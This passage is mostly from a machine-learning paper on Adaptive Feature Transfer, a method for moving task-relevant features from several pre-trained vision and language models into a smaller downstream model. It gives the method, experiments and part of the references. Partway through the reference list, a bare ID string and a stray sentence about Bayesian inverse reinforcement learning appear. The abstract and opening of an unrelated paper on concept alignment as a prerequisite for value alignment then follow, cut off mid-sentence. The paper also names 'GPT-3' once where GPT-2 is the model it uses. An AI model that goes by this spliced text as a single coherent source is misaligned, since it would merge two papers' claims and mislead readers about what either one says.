escalates to the point that many practitioners do not possess the resources to fine-tune state-of-the-art models in vision and language. Furthermore, this approach precludes transferring from multiple pre-trained models that... learn complementary information due to different pre-training strategies, when a variety of distinctly pre-trained models have become available in domains such as computer vision (Oquab et al., 2023; Radford et al., 2021; Kolesnikov et al., 2020; Chen et al., 2020) and language (Devlin et al., 2018; Sanh et al., 2020; Touvron et al., 2023). To address these limitations, we propose Adaptive Feature Transfer (AFT), a highly efficient method to transfer from an arbitrary set of pre-trained models into a single downstream model within the compute budget of training only the downstream model. Based on the observation that the features from a well-pretrained models are likely to contain information highly relevant to downstream predictions, AFT introduces an informative prior favoring low mutual information between the downstream inputs and features given the pre-trained features. AFT then efficiently optimizes it by exploiting a kernel formulation of the objective. This approach empowers AFT to perform cross-architecture transfers and assimilate complementary information from multiple pre-trained models. Across multiple vision, language, and multi-modal datasets, we show AFT delivers a substantial performance improvement compared to both standard transfer learning (STL) and alternatives such as Knowledge Distillation and B-Tuning (You et al., 2022). Moreover, we find AFT exhibits a high correlation between its performance and the quality of pre-trained features, measured by their linear probe accuracies, and a strong ability to harness complementary information learned by multiple pre-trained models (Figure 1). 2 RELATED WORK Transfer learning Standard transfer learning proceeds by loading a pre-trained parameter vector as the initialization for parameters $\theta$ of a downstream model with the same architecture, followed by updating $\theta$ by minimizing the downstream loss $L(\theta)$, known as fine-tuning (Zhuang et al., 2019). This simple approach has enabled state-of-the-art performances on a wide range of vision (Dosovitskiy et al., 2020; Oquab et al., 2023; He et al., 2015) and language tasks (Devlin et al., 2018; Touvron et al., 2023). To extract additional useful information from the pre-trained model, Shwartz-Ziv et al. (2022) propose a Bayesian transfer learning approach. In addition to using the pre-trained initialization, this approach uses an approximate posterior for the pre-training data as an informative prior $p(\theta)$ for downstream learning, leading to improved performance across several vision datasets. Similar to standard transfer learning, this approach restricts the downstream model to have the same architecture as the pre-trained model, since it requires evaluating the approximate posterior of the pre-trained model at the downstream parameters $\theta$. Conceptually, the Bayesian transfer learning perspective points to a natural possibility of transferring across architectures or from many pre-trained models. This can be done by defining an informative prior that similarly facilitates the transfer of information learned by the pre-trained models without requiring the downstream model to have the same architecture. Knowledge distillation Knowledge Distillation (KD) (Hinton et al., 2015) is a method that can be applied to compress a large model, referred to as the teacher model, to a smaller model, referred to as the student model, with the goal of minimizing performance degradation (Wang & Yoon, 2020). Traditionally, KD starts with a teacher $T$ trained on a dataset $D$ and then trains the student $S$ to match the predictions of the teacher on the same dataset to achieve model compression. In the setting of transfer learning, this version of KD is generally not suitable for training a student to perform a novel downstream task, since the teacher does not predict the downstream targets (e.g. the classes may be different) and we therefore don’t wish to match the student’s prediction to the teacher’s. Instead, we focus on the version of KD which trains the student to predict the teacher’s features $\phi_T$, such as through a learned linear transformation $V$ applied to the student’s feature $\phi_S$ under a regression objective $\mathbb{E}_{x \sim D} \left[ \| \phi_T(x) - V \phi_S(x) \|_2^2 \right]$, where $V$ can account for the difference in dimensionality (Heo et al., 2019a; Huang & Wang, 2017; Heo et al., 2019b; Gu et al., 2023; Ahn et al., 2019). This procedure can be extended to use multiple teachers by simultaneously minimizing the sum of multiple KD objectives each with a different teacher, as proposed in Liu et al. (2020); Wu et al. (2021), equivalent to simultaneously predicting the concatenation of the teachers’ features. While KD is a natural candidate for model compression, its objective is fundamentally misaligned with the goal of transfer learning. Ahn et al. (2019) show that the feature space KD objective has an information-theoretic interpretation as minimizing $H(\phi_T | \phi_S)$ the conditional entropy of the teacher. features given the student features, which penalizes any information learned by the teacher but not by the student. Since the teacher was trained on a related but different pre-training task, we should only aim to transfer information useful for performing the downstream task, rather than compressing all information learned by the teacher into the student irrespective of its downstream relevance. **Multi-Source Transfer Learning** Lee et al. (2019) propose to learn a classifier defined as a weighted combination of frozen pre-trained features, where the weights are derived from non-linear maximal correlation analysis. Chang et al. (2022) uses a mixture of experts (MoE) model to combine complementary information across different models and datasets to address the issue of data scarcity in material sciences. These methods do not reduce the inference cost with large pre-trained models. Gu et al. (2023) proposes to transfer features from the teachers to the students layer by layer, allowing for multiple teachers and different architectures. You et al. (2022) proposes Bayesian Tuning (B-Tuning) to efficiently transfer from heterogeneous pre-trained models by encouraging the fine-tuned model to predict the approximate posterior predictive mean of a linear model with pre-trained feature extractors, a low dimensional projection of the pre-trained features. In addition, several works propose to rank and select pre-trained models or features for transferring to a specific downstream task (You et al., 2022; Fumero et al., 2023; Deshpande et al., 2021). These methods are complementary to and can be used together with our method, which aims to maximize transfer performance once a set of pre-trained models is chosen. ### 3 Our Method: Adaptive Feature Transfer We now introduce Adaptive Feature Transfer (AFT), a method that enables transfer learning from a set of pre-trained models of arbitrary sizes and architectures into a single downstream model, with negligible compute overhead compared to only training the downstream model. #### 3.1 Constructing an Informative Prior from Pre-trained Features The core idea of AFT is to impose an informative prior on the downstream learning to favor making predictions based on information already present in the pre-trained features, as they are highly likely to contain useful knowledge for the downstream task. Specifically, let $\theta \in \mathbb{R}^P$ be the downstream model parameters, a random variable $X \in \mathbb{R}^{d_{\text{in}}}$ be the downstream inputs, $\Phi = \phi_\theta(X) \in \mathbb{R}^{d_\phi}$ be the features of the downstream model, $Y = W\Phi \in \mathbb{R}^{d_{\text{out}}}$ be the downstream model outputs, and $\Psi = \psi(X) \in \mathbb{R}^{d_\psi}$ be some fixed pre-trained features, formed by concatenating the last layer features from an arbitrary number of pre-trained. We encode our preference with a prior that favors low mutual information between downstream features $\Phi$ and the input $X$ conditioned on $\Psi$, $$p(\theta) \propto \exp(-\beta I(\Phi; X|\Psi)), \quad (1)$$ where the $I(\Phi; X|\Psi)$ measures information about the input used by the model to generate downstream features $\Phi$ that is not present in the pre-trained features $\Psi$ and $\beta > 0$ controls the strength of this prior. The mutual information is given by $$I(\Phi; X|\Psi) = H(\Phi|\Psi) - H(\Phi|X,\Psi) = \mathbb{E}_{\Phi,\Psi}[-\log p(\Phi|\Psi)] + c \leq \mathbb{E}_{\Phi,\Psi}[-\log q_\rho(\Phi|\Psi)] + c, \quad (2)$$ where $H(\Phi|X,\Psi)$ is some constant $c$ since $\Phi$ is deterministic given $X$ and we used a variational distribution $q_\rho(\Phi|\Psi)$ with variational parameters $\rho$ to approximate the inaccessible conditional density $p(\Phi|\Psi)$ and bound the mutual information. We then perform Maximum A Posteriori (MAP) estimation, which minimizes the resulting bound on the negative log posterior, equal to $L(\theta) + \beta R(\theta)$, where $L(\theta)$ is the unregularized loss (e.g. cross-entropy loss) and $R(\theta)$ is the bound on the mutual information given by $$R(\theta) = \min_\rho \mathbb{E}_{\Phi,\Psi}[-\log q_\rho(\Phi|\Psi)], \quad (3)$$ where the expectation can only be estimated using training samples. The effect of optimizing this objective is to maximize the downstream data fit while minimizing the information in downstream features $\Phi$ that cannot be decoded from the pre-trained features $\Psi$ via the map $q_\rho(\Phi|\Psi)$. after optimizing for variational parameters $\rho$. We consider a simple Gaussian parameterization $q_\rho(\Phi|\Psi) = \mathcal{N}(\Phi|\rho\Psi, I)$, where $\rho : \mathbb{R}^{d_\psi} \rightarrow \mathbb{R}^{d_\phi}$ is an affine transformation, which leads to: $$R(\theta) = \min_\rho \mathbb{E}_{\Phi,\Psi} \left[ \|\Phi - \rho\Psi\|^2 \right],$$ (4) after ignoring some $\theta$–independent constants. Since the minimization over the offsets in the affine transformation is equivalent to subtracting the mean from both $\Phi$ and $\Psi$, we will henceforth assume that $\Phi$ and $\Psi$ have been pre-processed to have zero-mean and assume $\rho \in \mathbb{R}^{d_\phi \times d_\psi}$ to be a linear transformation. Contrasting this objective with the KD objective, expressed in the current notations: $$R_{KD}(\theta) = \min_V \mathbb{E}_{\Phi,\Psi} \left[ \|V\Phi - \Psi\|^2 \right],$$ (5) with $V \in \mathbb{R}^{d_\psi \times d_\phi}$, we see that minimizing the KD objective requires the downstream $\Phi$ features to contain all information needed to predict the pre-trained features $\Psi$, while our objective $R(\theta)$ only requires the downstream features $\Phi$ to lie in the span of the pre-trained features $\Psi$, allowing for discarding information in $\Psi$. Therefore, when optimized together with the training loss, our objective $R(\theta)$ makes it much easier for the downstream model to selectively transfer only the task-relevant features from pre-training. 3.2 IMPROVING THE OBJECTIVE USING THE KERNEL Estimating the regularization term $R(\theta)$ requires handling both optimization and statistical challenges: 1) since evaluating $R(\theta)$ requires finding the optimal variational parameters $\rho$, which changes every time we update $\theta$, we want to maximally simplify the optimization problem for $\rho$, and 2) since we wish to estimate the true $R(\theta)$, or equivalently the true $I(\Phi,X|\Psi)$, whose exact value is given by an expectation over the true rather than empirical distribution of $\Phi$ and $\Psi$, we want to avoid over-fitting to the training data when optimizing for $\rho$ when we replace the expectation in Eq. 4 with its empirical estimate. In addition to the simplifying assumption on the form of $q_\rho(\Phi|\Psi)$, we now show how to exploit a kernel formulation of the objective to further mitigate both challenges. Recall that the behavior of a linear model $f(\cdot) = w^\top \phi(\cdot)$ is completely characterized by its kernel $k_\Phi(x,x') = \phi(x)^\top \phi(x')$. From a kernel perspective, the existence of $\rho \in \mathbb{R}^{d_\phi \times d_\psi}$ such that $\Phi = \rho\Psi$ is exactly equivalent to the existence of $\hat{\rho} \in \mathbb{R}^{d_\phi \times d_\psi}$ such that $k_\Phi = k_{\hat{\rho}\Psi}$. Therefore, in AFT we replace the $\ell_2$ distance between the features with a distance between their kernel functions $$R_{AFT}(\theta) = \min_\rho \sqrt{\mathbb{E} \left[ (k_\Phi(X,X') - k_{\rho\Psi}(X,X'))^2 \right]},$$ (6) where $X$ and $X'$ are drawn from the input distribution. As with the previous objective in Eq. 4, this objective achieves a minimum value of 0 if and only if each $\phi_i(\cdot), i = 1, ..., d_\phi$, are in the span of $\{\psi_i(\cdot)\}_{i=1}^{d_\psi}$. However, the kernel formulation has the key advantage that part of the optimization problem over $\rho$ is done automatically since the kernel is invariant under any orthogonal transformation of the features, implying that we only need to optimize $\rho$ up to an orthogonal transformation, significantly reducing the complexity of the inner optimization. To prevent over-fitting the variational parameters $\rho$ to the empirical distribution of the features, we parameterize $\rho$ as a diagonal matrix $\text{diag}(\sigma(s))$, i.e., $\rho_{ii} = \sigma(s_i)$, where $\sigma$ is the sigmoid function and $s$ is a $d_\psi$-dimensional vector. Note the ability to use a diagonal $\rho$ is a distinct advantage of the kernel formulation, which does not require the features to have the same dimensions. Using this parameterization, we greatly reduce the number of variational parameters to optimize, while retaining the ability for the model to weigh each dimension of the pre-trained features according to their task-relevance. Furthermore, thanks to using the kernel formulation, we are effectively searching over all $\rho' = U\rho = U\text{diag}(s)$, where $U$ is any orthogonal matrix, that map between pre-trained and downstream features, without actually optimizing the dense matrix $U$. Finally, we normalize the features to have unit $\ell_2$ norm before computing the respective kernels, i.e., $k_\Phi(x,x') := \phi(x)^\top \phi(x') / \|\phi(x)\| \|\phi(x')\|$, to reduce the variance in the entries of the kernel. In Section 4.5, we compare AFT with its other variants and show that both using the kernel formulation and learning a diagonal $\rho$ indeed improves its performance. Stochastic kernel distance estimation For a practical implementation, we estimate \[ \delta(\theta, \rho) := \sqrt{\mathbb{E}[(k_\Phi(X, X') - k_{\rho\Psi}(X, X'))^2]} \] with a mini-batch estimate \( \hat{\delta}(\theta, \rho) := \frac{1}{B} \sum_{i=1}^{B} \sum_{j=1}^{B} (k_\Phi(x_i, x_j) - k_{\rho\Psi}(x_i, x_j))^2 = \frac{1}{B} \| K_{\Phi_{\text{batch}}} - K_{\rho\Psi_{\text{batch}}} \|_F \), where \( K_{\Phi_{\text{batch}}}\) and \( K_{\rho\Psi_{\text{batch}}}\) are kernel matrices evaluated on a batch of \( B \) inputs. We then perform gradient-based optimization jointly over \( (\theta, \rho) \). Algorithm 1 details the training procedure using the SGD optimizer for simplicity. Note we compute and cache the pre-trained features on the training set once and simply retrieve them during training without spending additional time to compute them. **Algorithm 1 Adaptive Feature Transfer (AFT)** Require: Pre-computed pre-trained features, downstream data, downstream model \( f_\theta = W \circ \phi_\theta \), downstream loss function \( L \), batch size \( B \), learning rates \( (\eta_1, \eta_2) \), regularization coefficient \( \beta \) 1: for each mini-batch \( (X_{\text{batch}} \in \mathbb{R}^{B \times d_m}, Y_{\text{batch}} \in \mathbb{R}^{B \times d_{out}}, \Psi_{\text{batch}} \in \mathbb{R}^{B \times d_\psi}) \) do 2: Compute features \( \Phi_{\text{batch}} = \phi_\theta(X_{\text{batch}}) \in \mathbb{R}^{B \times d_\phi} \) and outputs \( \hat{Y}_{\text{batch}} = \Phi_{\text{batch}} W^\top \) 3: Scale pre-trained features \( \Psi_{\text{batch}} \leftarrow \Psi_{\text{batch}} \rho^\top \) 4: Subtract the mini-batch mean from \( \Phi_{\text{batch}} \) and \( \Psi_{\text{batch}} \) and normalize each row 5: Compute \( B \times B \) mini-batch kernels \( K_{\Phi_{\text{batch}}} = \Phi_{\text{batch}} \Phi_{\text{batch}}^\top \), \( K_{\rho\Psi_{\text{batch}}} = \Psi_{\text{batch}} \Psi_{\text{batch}}^\top \) 6: Compute mini-batch loss \( \hat{L}(\theta) = L(\theta, Y_{\text{batch}}, \hat{Y}_{\text{batch}}) \) and the kernel distance estimate: \[ \hat{\delta}(\theta, \rho) = \frac{1}{B} \| K_{\Phi_{\text{batch}}} - K_{\rho\Psi_{\text{batch}}} \|_F \] 7: Update \( \theta \) and \( \rho \) using SGD: \[ \theta \leftarrow \theta - \eta_1 \nabla_\theta \left( \hat{L}(\theta) + \beta \hat{\delta}(\theta, \rho) \right), \quad \rho \leftarrow \rho - \eta_2 \nabla_\rho \hat{\delta}(\theta, \rho) \] 8: end for 4 EXPERIMENTS We evaluate our proposed method Adaptive Feature Transfer (AFT) across a variety of vision, language, and multi-modal datasets and compare with standard transfer learning (STL), Knowledge distillation (KD), and B-Tuning [You et al., 2022]. All four methods start with the same pre-trained initialization of the downstream model, except that AFT, KD, and B-Tuning additionally optimize their respective regularization terms that enable transfer from one or multiple additional pre-trained models. A hyperparameter \( \beta > 0 \) is tuned on validation performance to optimally weigh the regularization term for each method. We include full experiment details, such as hyperparameter tuning in the Appendix A. We report the mean and standard errors computed across 3 runs for each method. 4.1 IMAGE CLASSIFICATION Effective transfer from SOTA vision foundation models We evaluate AFT’s ability to transfer from state-of-the-art vision foundation models into commonly used downstream architectures, including ViT-S [Dosovitskiy et al., 2020], MLP-Mixer-B [Tolstikhin et al., 2021], and ResNet-50 [He et al., 2015]. We initialize the downstream models with ImageNet-1K checkpoints for all methods. In Figure 2a and 2b, we show performance when transferring from ViT-G DINOv2, the largest model in the DINOv2 family with over a billion parameters, on CIFAR-10 [Krizhevsky et al., 2009], CIFAR-100 [Krizhevsky et al., 2009], Oxford Flowers-102 [Nilsback & Zisserman, 2008], Oxford-IIIT Pets [Parkhi et al., 2012], Describable Textures Dataset (DTD) [Cimpoi et al., 2014] and Food-101 [Bossard et al., 2014] datasets. We find AFT significantly boosts the performance of all three models, reducing the error by an average of over 15% relative to STL performance (Figure 2a), and considerably outperforms KD and B-Tuning in most cases as well as on average. Transfer from multiple pre-trained models In Figure 2c, we show the performance on CIFAR-100 when transferring from various vision foundation models, including BiT ResNet-101x3 [Kolesnikov et al., 2020] (denoted BiT), CLIP ViT-G [Radford et al., 2021] (denoted CLIP) and ViT-G DINOv2 [Oquab et al., 2023] (denoted DINO). AFT yields large improvements over STL and significantly outperforms all other competing methods except for ResNet-50, where KD is better. by a small margin compared to AFT. AFT consistently achieves the best performance by transfer from multiple pre-trained models such as DINOv2 + CLIP or BIT + DINOv2 + CLIP, suggesting that AFT is leveraging complementary features learned by these models due to different inductive biases, pre-training objectives, and pre-training data. For example, while CLIP is trained with a contrastive objective for matching images to texts, DINOv2 is trained with pure self-supervision without text information, and BiT is fully supervised and uses a ResNet architecture rather than a ViT. Consequently, each model is likely to learn useful but different visual features that contain complementary information relevant to the downstream task. On the other hand, combining pre-trained features from multiple models can lead to rapid growth in the amount of redundant or irrelevant features, necessitating an adaptive approach that can identify and only transfer the most relevant subset for the task. In Section 4.4, we show AFT indeed adaptively reweights the features depending on the pre-trained models provided. By contrast, in Figure 2c, we find that KD, which aims to distill all information learned by the pre-trained models, is unable to benefit from using multiple of them. Predictable performance scaling As AFT biases the final-layer linear predictor to use task-relevant features from the pre-trained models, we expect its performance to correlate with the quality of pre-trained features, as measured by their linear probe accuracy (accuracy of a linear classifier using those features). Indeed, Figure 2d shows a strong correlation between the two, demonstrating that 1) AFT is effective at transferring the kernel formed by the features of the pre-trained kernel, and 2) AFT will achieve better performance with pre-trained models that learn more useful features for the downstream task. As a result, we can predict for which pre-trained model(s) AFT will likely Figure 3: Evaluation on 8 language dataset using BERT Small and DistillBert as downstream models. (a) AFT achieves a significantly lower normalized error, averaged across 6 datasets and 2 downstream models when transferring from Flan-T5 Large. The error is normalized by the STL error before averaging. (b) Breakdown of unnormalized error for each downstream model and dataset. (c) Downstream accuracy versus linear probe accuracy of pre-trained features for AFT, B-Tuning, and KD, averaged across both downstream models on BoolQ. AFT yields consistent performance gains as we improve the quality of the pre-trained features, showing the highest correlation with the linear probe accuracy. The marker size is proportional to the number of parameters in the pre-trained models, ranging from 61M to 14B. achieve the best performance, by evaluating their linear probe accuracies, greatly simplifying the selection of the pre-trained model(s) in practice. Indeed, we could have correctly predicted in every setting that transferring from ViT DINOv2 + ViT CLIP would outperform transferring from either by noting that the combination of both models has a higher linear probe accuracy than either model. By comparison, other methods’ performance is less well correlated with the linear probe accuracy, which explains why they don’t benefit from transferring multiple models and provides strong evidence to our claim that AFT is a superior approach to transfer learning that should scale better as we use larger and better pre-trained models. While the linear probe accuracy of a sufficiently large pre-trained model can exceed the accuracy of AFT, the former is only efficient to train (via logistic regression) but still expensive to deploy, as it requires inference with the original pre-trained model, and is therefore not a viable alternative to the methods considered here. For example, the linear probe accuracy of ViT-L CLIP roughly matches AFT accuracy when transferred to ViT-S on CIFAR-100, but ViT-L CLIP has 428M parameters, 20 times larger than ViT-S. 4.2 Natural Language Processing We explore transferring from some of the strongest open-source large language models, including GPT-2 (Radford et al., 2019), Flan-T5 (Chung et al., 2022), and LLaMA 2 (Touvron et al., 2023), into much smaller ones: BERT Small (Devlin et al., 2018) and DistillBERT (Sanh et al., 2020). In language models, there is no exact analog of last-layer features at the input level since the model maintains an embedding for each token. As such, we follow the common practices for extracting input (i.e. sequence) level features for the following models used in our evaluation as follows: we use the embedding of the [CLS] token for BERT models, and the decoder’s embedding of the last token for GPT-3, Flan-T5, and LLaMA. In Figure 3a and 3b, we show the performance of AFT and competing methods at transferring from Flan-T5 Large to BERT Small and DistilBERT on the following 8 datasets: Large Movie Review (IMDB) (Maas et al., 2011), BoolQ (Wang et al., 2019), MNLI (Williams et al., 2018), SST-2 (Socher et al., 2013), MRPC (Dolan & Brockett, 2005), QQP (Wang et al., 2018), QNLI (Rajpurkar et al., 2016) and RTE (Wang et al., 2018). AFT significantly outperforms the competing methods. Similar to the case for vision, we find AFT’s performance scales with a strong correlation with the linear probe accuracy of pre-trained features, as shown in Figure 3c, whereas other methods have a much lower correlation. In addition, we find using AFT with pre-trained language models with instruction-tuning, like Flan-T5 and LLaMA Chat, led to the best performance after transfer, in line with their superior zero-shot question answering capabilities (Chung et al., 2022). Unlike in vision datasets, we find combining multiple pre-trained models often leads to no improvement in AFT’s performance, as shown in Figure 3c. However, this behavior is not surprising since combining these pre-trained models does not increase the linear probe accuracy either, suggesting there is little complementary and non-overlapping information learned between these pre-trained language models. A natural explanation here is that these pre-trained large language models are all highly similar to each other in the pre-training datasets, objectives, and architectures, since they are all transformer-based generative models trained predominantly with next or masked token prediction on a similar distribution of text from the internet. 4.3 Multi-modality The capability to efficiently transfer from multiple models naturally positions AFT for use in multi-modal applications. In these settings, the architecture typically includes modality-specific sub-components, like an image encoder and a text encoder. Since pre-trained models with strong performance often exist for each individual modality, we expect AFT can boost multi-modal performance by transferring the complementary, modality-specific features learned by these models. To illustrate this possibility, we consider SNLI-VE (Xie et al., 2019, 2018), a challenging visual entailment dataset where the objective is to determine if a given text accurately corresponds to an image, with the possible classes being positive, negative, or neutral. We use the smallest version of CLIP as the downstream model, which consists of a ResNet-50 image encoder and a transformer text encoder, initialized to the trained checkpoint. From the image features $\phi_I(x_I)$ and text features $\phi_T(x_T)$, we construct a classifier $f_\theta(x_I, x_T) = W \phi(x_I, x_T)$ whose features $\phi(x_I, x_T)$ is given by the (flattened) tensor product $\phi_I(x_I) \otimes \phi_T(x_T)$, which represent the pairwise interactions between the image and text features and enable computations such as $\phi_I(x_I)^\top \phi_T(x_T)$, a measure of semantic similarity between the image and text due to the CLIP pre-training. In Table 1, we find that AFT can improve CLIP’s performance on this task by simultaneously transferring from a ViT-L trained with DINOv2 and LLaMA 13B and again outperforms KD. Table 1: AFT improves CLIP’s accuracy on SNLI-VE by transfer from DINOv2 and LLaMA 13B. | Method | STL | KD | AFT | |------------|-------|-------|--------| | SNLI-VE Acc.| 73.69±0.28 | 74.05±0.05 | **74.39±0.18** | 4.4 Visualizing learned feature weighting in $\rho$ In Figure 4a, we show the distribution of learned feature weights $\rho_i$ at convergence on CIFAR-100 with ViT-S as the downstream model and pre-trained models from the set {BiT, DINO, CLIP}. AFT indeed learns non-uniform weighting for individual features ($\rho_i$ is initialized to 0.5 for all $i$). When transferring from all three models, AFT learns to upweight CLIP and DINO features and downweight BiT features, in line with our finding in Figure 2c that adding BiT to DINO and CLIP features did not improve further transfer performance. In Figure 4b, we show the weights learned when we transfer from DINO and a random noise model whose features contain no useful information and are sampled from $\mathcal{N}(0, I_{d_{noise}})$, where $d_{noise} = 2048$ is the feature dimension of the noise model. AFT successfully assigns much smaller weights to the noise features so that the performance is unaffected by their presence, as shown in Figure 4c. By contrast, KD performance quickly degrades to near STL level as we introduce the noise features. Figure 4: (a) Distribution of learned feature weights $\rho$ for each pre-trained model. The legend shows which pre-trained models are simultaneously used. (b) Distribution of $\rho$ in the presence of random noise features. (c) AFT performance as a function of noise dimensions. ### 4.5 Ablation Experiments We investigate the impact of key design choices in AFT on its performance on CIFAR-100 and BoolQ dataset. We compare AFT with four other variants where a) we do not use a kernel formulation and directly use the objective listed in Eq. [4] as a regularization, b) the ability to learn a diagonal $\rho$ is disabled, causing it to default to identity, c) we replace the linear kernel $k(x, x') = \phi(x)^T \phi(x')$ with radial basis function (RBF) kernel $k(x, x') = \exp\left(-\|\phi(x) - \phi(x')\|^2\right)$, or d) we perform bi-level optimization over $\theta$ and $\rho$ by performing 5 inner updates for $\rho$ per update of $\theta$. We find using the kernel formulation and learning the feature weights $\rho$ are essential to AFT’s performance, while the use of alternative kernels such as the RBF kernel and bi-level optimization does not impact the performance in any significant way. We also investigate the effectiveness of AFT in data-scarce scenarios by sub-sampling the CIFAR-100 and BoolQ training set. AFT remains the most effective method across training set sizes. Figure 5: (a) Ablation studies: using the kernel and learning $\rho$ are the most essential contributors to AFT’s performance. (b) AFT is the best performing method across data set sizes. ### 5 Conclusion Our work addresses an important and timely problem in transfer learning: how to efficiently transfer from the variety of pre-trained models, each requiring increasingly large compute budgets to directly fine-tune and perform inference with, into a single smaller downstream model. To do so, we propose AFT, a novel method for transfer learning that accurately reflects the reality that not all the pre-trained features will be relevant to the downstream task. As a result, AFT is fundamentally more well-suited for transfer learning than Knowledge Distillation, which transfers information irrespective of its relevance to the downstream task. Through an extensive evaluation with various state-of-the-art pre-trained models and downstream models on 15 datasets across vision, language, and vision-language tasks, we show AFT significantly outperforms the competing methods across the board and benefits considerably more from stronger pre-trained models. We hope our work enables the community to more effectively leverage large pre-trained models that have otherwise been prohibitively expensive to use. REPRODUCIBILITY STATEMENT We provide a self-contained anonymous code base for reproducing all results at https://anonymous.4open.science/r/aft-6C30. We also provide training details including the hyperparameter grid, optimizer, and data preprocessing in Appendix A. We have carefully checked that the method description presented in Section 3 correctly corresponds to our implementation. REFERENCES Sungsoo Ahn, Shell Xu Hu, Andreas Damianou, Neil D Lawrence, and Zhenwen Dai. Variational information distillation for knowledge transfer. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 9163–9171, 2019. Rishi Bommasani, Drew A. Hudson, Ehsan Adeli, Russ B. Altman, Simran Arora, Sydney von Arx, Michael S. Bernstein, Jeannette Bohg, Antoine Bosselut, Emma Brunskill, Erik Brynjolfsson, Shyamal Buch, Dallas Card, Rodrigo Castellon, Niladri S. Chatterji, Annie S. Chen, Kathleen Creel, Jared Quincy Davis, Dorottya Demszky, Chris Donahue, Moussa Doumbouya, Esin Durmus, Stefano Ermon, John Etchemendy, Kawin Ethayarajh, Li Fei-Fei, Chelsea Finn, Trevor Gale, Lauren Gillespie, Karan Goel, Noah D. Goodman, Shelby Grossman, Neel Guha, Tatsunori Hashimoto, Peter Henderson, John Hewitt, Daniel E. Ho, Jenny Hong, Kyle Hsu, Jing Huang, Thomas Icard, Saahil Jain, Dan Jurafsky, Pratyusha Kalluri, Siddharth Karamcheti, Geoff Keeling, Fereshte Khani, Omar Khattab, Pang Wei Koh, Mark S. Krass, Ranjay Krishna, Rohith Kuttipudi, and et al. On the opportunities and risks of foundation models. CoRR, abs/2108.07258, 2021. URL https://arxiv.org/abs/2108.07258 Lukas Bossard, Matthieu Guillaumin, and Luc Van Gool. Food-101 – mining discriminative components with random forests. In European Conference on Computer Vision, 2014. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. Advances in neural information processing systems, 33:1877–1901, 2020. Rees Chang, Yu-Xiong Wang, and Elif Ertekin. Towards overcoming data scarcity in materials science: unifying models and datasets with a mixture of experts framework. npj Computational Materials, 8(1):242, 2022. Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey Hinton. A simple framework for contrastive learning of visual representations. In International conference on machine learning, pp. 1597–1607. PMLR, 2020. Hyung Won Chung, Le Hou, Shayne Longpre, Barret Zoph, Yi Tay, William Fedus, Yunxuan Li, Xuezhi Wang, Mostafa Dehghani, Siddhartha Brahma, Albert Webson, Shixiang Shane Gu, Zhuyun Dai, Mirac Suzgun, Xinyun Chen, Aakanksha Chowdhery, Alex Castro-Ros, Marie Pelлат, Kevin Robinson, Dasha Valter, Sharun Narang, Gaurav Mishra, Adams Yu, Vincent Zhao, Yanping Huang, Andrew Dai, Hongkun Yu, Slav Petrov, Ed H. Chi, Jeff Dean, Jacob Devlin, Adam Roberts, Denny Zhou, Quoc V. Le, and Jason Wei. Scaling instruction-finetuned language models, 2022. M. Cimpoi, S. Maji, I. Kokkinos, S. Mohamed, , and A. Vedaldi. Describing textures in the wild. In Proceedings of the IEEE Conf. on Computer Vision and Pattern Recognition (CVPR), 2014. Aditya Deshpande, Alessandro Achille, Avinash Ravichandran, Hao Li, Luca Zancato, Charless Fowlkes, Rahul Bhotika, Stefano Soatto, and Pietro Perona. A linearized framework and a new benchmark for model selection for fine-tuning. arXiv preprint arXiv:2102.00084, 2021. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: pre-training of deep bidirectional transformers for language understanding. CoRR, abs/1810.04805, 2018. URL http://arxiv.org/abs/1810.04805 Bill Dolan and Chris Brockett. Automatically constructing a corpus of sentential paraphrases. In Third International Workshop on Paraphrasing (IWP2005), 2005.
MQ4JJIYKkh
Scaled-up, however, both the reward model and the approximate planning model would need to be far more complex, to the point where we would not expect (an approximation of) Bayesian IRL to be any more sample efficient that behavioral cloning with a similarly complex policy model
CONCEPT ALIGNMENT AS A PREREQUISITE FOR VALUE ALIGNMENT Anonymous authors Paper under double-blind review ABSTRACT Value alignment is essential for building AI systems that can safely and reliably interact with people. However, what a person values—and is even capable of valuing—depends on the concepts that they are currently using to understand and evaluate what happens in the world. The dependence of values on concepts means that concept alignment is a prerequisite for value alignment—agents need to align their representation of a situation with that of humans in order to successfully align their values. Here, we formally analyze the concept alignment problem in the inverse reinforcement learning setting, show how neglecting concept alignment can lead to systematic value mis-alignment, and describe an approach that helps minimize such failure modes by jointly reasoning about a person’s concepts and values. Additionally, we report experimental results with human participants showing that humans reason about the concepts used by an agent when acting intentionally, in line with our joint reasoning model. 1 INTRODUCTION People’s thoughts and actions are fundamentally shaped by the concepts they use to represent the world and formulate their goals. Imagine watching someone waiting to cross a busy intersection. Making sense of their behavior requires understanding their representation of things like “the crosswalk,” “the road,” “the bike lane,” and “the right of way.” For instance, it is important to take into account whether someone understands or is aware of the part of the street designated the “bike lane” while they wait since otherwise their intentions could be misinterpreted (e.g., a naïve observer might think someone standing in the bike lane is trying to get hit by a bicycle). Yet, current approaches to inferring human goals, rewards, and values (e.g., standard inverse reinforcement learning [Abbeel & Ng, 2004] and value alignment [Hadfield-Menell et al., 2016]) largely neglect the possibility that a machine observer and a human actor can have misaligned concepts. Our goal in this work is to formally state the problem of concept alignment, begin to explore algorithmic solutions, and compare these solutions to human judgments. To formalize concept alignment, we draw on the recently proposed framework of value-guided construal [Ho et al., 2022], which provides a computational account of how humans form simplified representations of problems in order to solve them. A construal is a particular interpretation of a problem in terms of a set of concepts and related causal affordances. Different construals encode different conceptual understandings of the world: for example, if one understands the concept of the bike lane and includes it in their current construal, they are aware that bicycles are often in the bike lane, cars generally avoid the bike lane, you might get hit if you stand in the bike lane, etc. People often prefer simpler construals since they are less cognitively effortful [Ho et al., 2023], but this can affect the quality of one’s actions—e.g., if you fail to distinguish the bike lane from the sidewalk, you might stand in a place where a bicycle will hit you! As we discuss later, our approach is to incorporate construals into a forward model of planning, which allows us to articulate the problem of conceptual misalignment as a form of misspecified inverse planning [Baker et al., 2009]. We propose a theoretical framework for formally introducing concepts to inverse reinforcement learning and show that conceptual misalignment (i.e., failing to consider construals) can lead to severe value misalignment (i.e., reward mis-specification; large performance gap). We validate these theoretical results with a case study using a simple gridworld environment where we find that IRL agents that jointly model construals and reward outperform those that only model 